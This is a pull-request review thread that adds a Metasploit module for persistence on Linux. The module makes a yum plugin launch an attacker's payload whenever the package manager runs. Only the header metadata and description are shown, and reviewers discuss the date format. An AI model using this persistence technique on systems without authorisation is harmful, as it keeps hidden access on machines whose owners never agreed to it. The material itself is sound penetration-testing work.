modules/exploits/linux/local/yum_package_manager_persistence.rb

```diff
@@ -0,0 +1,130 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+  include Msf::Post::File
+  include Msf::Post::Linux::System
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Yum Package Manager Persistence',
+      'Description'    => %q{
+        This module will run a payload when the package manager is used. No
+        handler is ran automatically so you must configure an appropriate
+        exploit/multi/handler to connect. Module modifies a yum plugin to
+        launch a binary of choice. grep -F 'enabled=1' /etc/yum/pluginconf.d/
+        will show what plugins are currently enabled on the system.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [ 'Aaron Ringo' ],
+      'Platform'       => [ 'linux','unix' ],
+      'Arch'           =>
+        [
+          ARCH_CMD,
+          ARCH_X86,
+          ARCH_X64,
+          ARCH_ARMLE,
+          ARCH_AARCH64,
+          ARCH_PPC,
+          ARCH_MIPSLE,
+          ARCH_MIPSBE
+        ],
+      'SessionTypes'   => [ 'shell', 'meterpreter' ],
+      'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' },
+      'DisclosureDate' => 'Dec 17 2003', # Date published, Robert G. Browns documentation on Yum
```

Comment:
```suggestion
      'DisclosureDate' => '2003-12-17', # Date published, Robert G. Browns documentation on Yum
```

Reply:
I had seen this comment on the previous module,  is the format changing?

Reply:
Metasploit was updated a few months ago to support both formats. International standard date format is objectively superior.